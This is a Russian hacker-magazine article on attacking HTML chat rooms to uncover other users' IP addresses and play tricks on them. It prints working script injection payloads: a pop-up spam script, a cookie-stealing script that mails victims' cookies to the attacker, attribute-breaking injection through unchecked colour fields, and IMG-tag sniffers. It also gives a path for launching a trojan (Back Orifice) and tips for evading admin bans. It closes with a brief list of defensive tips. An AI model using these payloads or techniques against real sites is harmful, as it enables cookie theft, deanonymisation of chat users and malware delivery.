Внимание! Данная статья не имеет своей целью обучить чему-то новому кул хацкеров, она направлена прежде всего на низкий и средний уровень владения хакингом! Предупреждаю сразу!!!=))

Всем прет!!! Хотелось бы все-таки… извиниться перед не того ожидавшей аудиторией — вся проблема, честно говоря, состоит всего лишь в том, что эта статья (предыдущую имею в виду) для печати не предназначалась!!! Это была «проба пера», проверка стиля написания, так что, в принципе, все упреки безосновательны по причине того, что я не знал даже, что эта статья будет напечатана… Как так получилось: лежала мило она в папочке «Наброски», и вдруг в папке «Отправленные» Аутлука вижу письмо на адрес
xa@real.xakep.ru с вложенным файликом «Попытка не пытка, или пытаемся узнать Ip в html-чате»!!! Потом оказалось — старший братик «пошутил»… Ну я сразу на сайт, а там… упасть не встать… чуть в самом деле не упал… Ну да ладно — назвался грибом — полезай в корзину, взялся за гуж — не говори — не дюж, от меня не убыло, от своего авторства не отказываюсь… Придется теперь писать про чаты… Итак — обещанная вторая статья про то, как узнать IP в html-чате и еще несколько приколов из той же серии (напоминаю, первоначальное название редакция изменила) 

Но для начала еще немного про предыдущую статью… Почитал, говорю, я отзывы — и честно скажу: не обрадовали они меня… Пришлось самому отзыв на отзывы печатать, а это дело гнилое — ругаться с читателями… Ладно, сам виноват, надо было статьи писать не про чаты, а про определение ОСи или DoS-атаки… Социнженерия видно нынче не в почете…=(( А все-таки зря!!! Вдумайтесь: то что вы называете ламерской методикой, реально ни разу меня не подвело (так же как и сниффер, который кто-то там грозился написать — есть у меня свой, да и хакзоновский или любой другой юзать можно=), зато плюсов целая куча: меня ни разу не выкинули из чата, ни разу не убили, ни разу я ни с кем не ругался, если сам этого не хотел… Тем более что защита от большинства чат-снифферов предельно проста — либо намертво отрубить отображение картинок в свойствах Эксплорера, либо запретить для отображения все «прозрачные» теги (на некоторых чат-серваках это можно делать лично для себя)… А против головы, батеньки, нет приема, кроме другой головы, так что тут вопрос только в том, кто умнее и хитрее… Вы называете эту технологию ламерской, но вы сначала попробуйте добиться того, чтоб таким макаром получать IP хотя бы от 50% выбранных жертв… Вот тогда и скажите, что это раз плюнуть — развести «жертву» так, чтоб она сама без подозрений практически отдала вам в руки свой IP… Кто-то там, помню, говорил, что мол чего челу стоит отправить письмо, уйти и снова прийти? А что челу стоит после использования сниффера также уйти и зайти??? И еще — кто-то сказал, что эта методика рассчитана только на лохов — дык товарисчи, ваше дело и состоит в том, чтоб чел не догадался, что он лох, но стал бы им, хоть на время… Можно HDoS даже применить, но в рамках чата это трудновато. Так что — думайте сами, решайте сами… Ну а теперь, Федя, о главном=)) Поехали!

ВСЕ, КОМУ В ЛОМ ЧИТАТЬ ТАКУЮ ДЛИННУЮ СТАТЬЮ, МОГУТ… НЕ ЧИТАТЬ ЕЕ!!!=))

Предыстория

После обзора статей, посвященных взлому чатов, и почти четырехчасового лазанья по ссылкам, выданных родным Яндексом, я был немало обескуражен — на комбинацию слов «чат+взлом» система выдала мне больше 10000 ссылок… Когда я просмотрел 20 страниц, мне стало совсем плохо и я поставил перед собой тазик — реально из 100 ссылок я получил 6 (!!!!!) нормальных статей, первоначальное авторство которых было сложно установить… Тазик пригодился мне в первый раз… Возможно особо одаренные кул хацкеры бросятся проверить мой опыт и гордо воскликнут в мессаге «Брешешь, ламер, там их 10!!!», но это ничего не изменит… Все статьи — как под копирку. Когда я вчитался в содержание всех остальных статей, тазик пригодился второй раз… Я бы никогда не догадался, что вывод мата сквозь автоматическую систему фильтрации можно считать взломом чата!!! Периодически меняя тазики, я опытным путем добрался-таки до зерен истины, и… не обнаружил там для себя ничего нового!!! За прошедшие с моей последней попытки поинтересоваться взломом чатов полгода не добавилось ни одной нормальной новой статьи про взлом чатов, а уж про определение IP тем более… Тогда-то я и решился исправить это упущение.

Введение

До того, как рассмотреть нижеследующее, я хотел бы рассказать еще кое-что о чатах. На этот раз это будет не описанное в предыдущей статье физичекое устройство, а скорее факторы риска. Итак, на мой взгляд, все чаты можно разделить по уровню защиты на 4 уровня: 
1) Админа нет вообще — делайте что хотите=)
2) Админ вроде и есть, но фиговый или временно ушел покурить — аналогично, но побыстрее, пока он не вернулся или до него не дошло, что вы там собираетесь делать;)
3) Админ есть, но защита слабовата — рисует только IP — юзайте анонимную проксю и меняйте ее, если что нехорошее случится…
4) Админ есть, защита сильна — рисует вдобавок к IP и домен… Это не есть карашоу, это тяжелее… Но в принципе решается это дело тоже до гениального просто — подключаетесь через другого провайдера (через связь которого вас не выкидывали), заходите на сайт, отключаетесь и подключаетесь снова через первого. Все будет нормалек, а если вдруг опять выкинут — просто повторите всю шутку заново=) 

И еще — если что-то все-таки произошло и в чат вас не пускают никаким образом — попробуйте подчистить кукисы=)

Обзор вариантов западла в чатах

Основным методом взлома чатов является сохранение той формы, которую вы видите, заходя на сервак, на собственный хард, и изменения формы путем прописки полных адресов и замены строк типа
<input type=hidden name= cookie value=SP202134> на <input type=text name=cookie
value=SP202134> и последующей сборки окна чата из реальных и сохраненных фреймов. Делается это обычно так:

Start.htm — это и есть тот фрейм который нужно сохранить и изменить. 

Что это дает??? Возможность обойти зарегистрированные имена и сокрытие своего IP за чужим ID от киллеров. В дальнейшем над этой формой надо еще слегка поизвращаться и довести ее до ума, чтоб сделать отправку скриптов в общий фрейм легкой и приятной… Да, кстати, одной из возможных фенек является прописка скрипта в информацию о себе, которую вы даете при регистрации… Представьте только, как здорово — вы просто регистрируетесь, а каждый чел, который захочет глянуть вашу анкету, получает широкий спектр возможных подлянок — от простого захламления Рабочего стола ненужными окошками до впаривания трояна (где-то посерединке находится и получение IP или кукисов=) для примера привожу известный всем (вдруг не всем?) скрипт ЗАРАЗЫ aka Ученого Кота:

<script>

for( I=1 ; I&lt=11 ; I++ )

{
if( I==1 ) alert( «Че те надо?????» );
else alert( «Я тя » + ( (I==11)? «последни» : I ) + «й раз спрашиваю — че те надо???» );
}
alert(«а здесь все равно нету нифика…»);
top.frames[‘Inform’].document.forms[0].Accent.options[31].selected = 1;
top.frames[‘Inform’].document.forms[0].Announce.value = «Я люблю тебя, 3APA3A!»;
top.frames[‘Inform’].document.forms[0].submit();
top.frames[‘Dark’].document.forms[2].submit();
</script>

Путем нехитрой модификации скрипта можно добиться поразительных результатов… Но признаюсь — я прописать скрипт в анкету не пробовал — тем более что дырка эта уже почти везде закрыта и регистрационные анкеты сначала просматривают админы…

Есть еще одна интересная штука:

<script language=javascript>
var cook=show_all_cookies();
document.open(«cookies»,cook);
document.write(‘&lt form onsubmit="javascript:window.close();"
method=post action="mailto:my_mail@mail.ru"
ENCTYPE="text/plain" >&lt input type=hidden
name=h1 value=’,cook,’>&lt input type=submit value=»Нажмите чтобы закрыть»>
&lt/form> ‘);
document.close(«cookies»);
</SCRIPT>

Как вы наверняка поняли, это западло, посылающее кукисы вашей жертвы вам на мыло, попробуйте оптимизировать его. Кукисы — это вещь, там хранится и IP жертвы, и ID в чате, и много всего остального, полезного-преполезного=)) Но, кстати, есть один минус — вы светите свое мыло (в примере, как вы поняли, my_mail@mail.ru) 

Модифицируют форму обычно следующим образом: в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста,
как правило, вводимые им значения цвета не проверяются, можно, например, в качестве цвета вместо любимого значения ‘black’ задать ‘><script’ (если тег печатается в чате как <FONT COLOR=black&gt Если печатаются кавычки (COLOR=»black»), то задача несильно усложняется — надо всего лишь их нейтрализовать, например ‘»><script
p="’ =) Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности… Но нужно отметить что засунуть закрывающий тег тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

Итак, путем, предназначенным для заподлянства в чате, в том числе и кражи IP, служит использование разрешенных тегов (в большинстве чатов теги вроде script естейственно запрещены, и обычно отправка скрипта осуществляется путем использования тега BGSOUND, EMBED, OBJECT, DIV и т.д., обычно это выглядит так:
<IMG SRC=" своих темных целей;-) Именно таким путем работают снифферы, например знаменитый чат-сниффер хакзоны, да и мои
не далеко ушли, с той только разницей, что лог ведется в другом месте… Самым простым способом является указание на чей-нибудь сниффер в теге SRC непосредственно в общем окне (как все помнят, данный тег выполняется на машине, никого не спрашивая, если только просмотр картинок не отключен) и все IP у вас в кармане. Рекомендую, зайдите на какой-нибудь простенький, но со вкусом чат, покопайтесь в исходнике фреймов, все что можно слейте себе на хард, полистайте книги и напишите свой сниффер, как гласит одно из определений словечка «хакер» это такой странный человек, которому больше нравится писать свои программы, чем использовать чужие=) Именно по этой причине я не даю ни одной ссылки на существующие в сети снифферы и не даю окончательных, применяемых мной вариантов приведенных скриптов дорабатывайте сами, труд, батенька, облагораживает человека, нужно учиться, учиться и еще раз учиться, как завещал великий Ленин, а не переписывать чужие скрипты это вам в голове ничего не прибавит… Мне конечно скриптов не жалко, но разозлили меня откликами на предыдущую статью (набросок имею в виду, где я оказался ЛАМЕРом aka ДЕБИЛом=) порядком, так что звиняйте, хлопцы, бананьев нэма… Но, все-таки, если людям захочется я ОБЕЩАЮ третью статью, где опубликую все окончательные результаты МОИХ исследований на тему взломов чата и защиты в чате (здесь же и ИРКа будет, наверно, приплетена, идеи и наброски на эту тему уже есть…)
Так что думайте. А пока продолжаем. Многих интересует вопрос — а почему сниффера или трояна обычно запускают из сети, а не с своего компьютера? Нельзя, мол, что ли??? Можно!!! Адрес для запуска должен выглядеть так: 127.0.0.1/c:\bo.exe где, что и ежу понятно, 127.0.0.1 — IP компа, у которого прямо на диске С хранится ваш любимый BO… Аналогично может впариваться любая другая примочка, включая скрипты и все прочее… Вот так вот. 

Теперь несколько слов о том, как защититься от всего того, что я тут расписал — прежде всего, перед заходом на чат отключите отображение картинок, если кто не знает как — в IE Сервис\Свойства обозревателя\Вкладка «Дополнительно», в разделе «Мультимедиа» снять галочку с «Отображать рисунки» — вы ничего не потеряете, в нужное время нужную картинку можно легко рассмотреть, кликнув правой
кнопкой и выбрав «Показать рисунок». Во-вторых — не ходите на ссылки, которые вам дают в чате, если не уверены на 100%, что это именно то, что вам нужно. В-третьих — юзайте анонимную проксю. В-четвертых — если возможно, то отключите для отображения все теги, с помощью которых на вашей машине может быть запущен скрипт. В-пятых — пользуйтесь презервативами… ой, кажется это из другой оперы!;-)

Это был КРАТКИЙ обзор информации по западлу и узнаванию IP в чате — уровень чуть выше, чем в предыдущей статье, главное знать html и javascript хотя бы на начальном уровне. Если поступят нормальные отклики на эту статью, то будет проведена серьезная исследовательская работа, распотрошена пара фирменных (моих=) скриптов и снифферов, приведены примеры конкретных взломов и т.д. — но на это должно уйти много времени, предупреждаю сразу. Поэтому следующая моя статья будет посвящена чему-нибудь имеющему более близкое отношение к хакингу — либо проблемам определения ОСи на удаленной машине (вручную=), либо DoS-атакам, либо… вообще не будет никакой статьи=) — все зависит, как всегда, от вашей реакции… В общем пишите на сайте отзывы — обязательно буду учитывать! Заранее благодарен за отзывы типа «Тоже херовенько, но явно лучше, чем в прошлый раз=)!!!

Оставить мнение

Check Also

Как сделать игру. Выбираем движок и пишем клон тех самых «танчиков»

С каждым днем игры становятся все сложнее и навороченнее. Быть инди, а точнее соло-разрабо…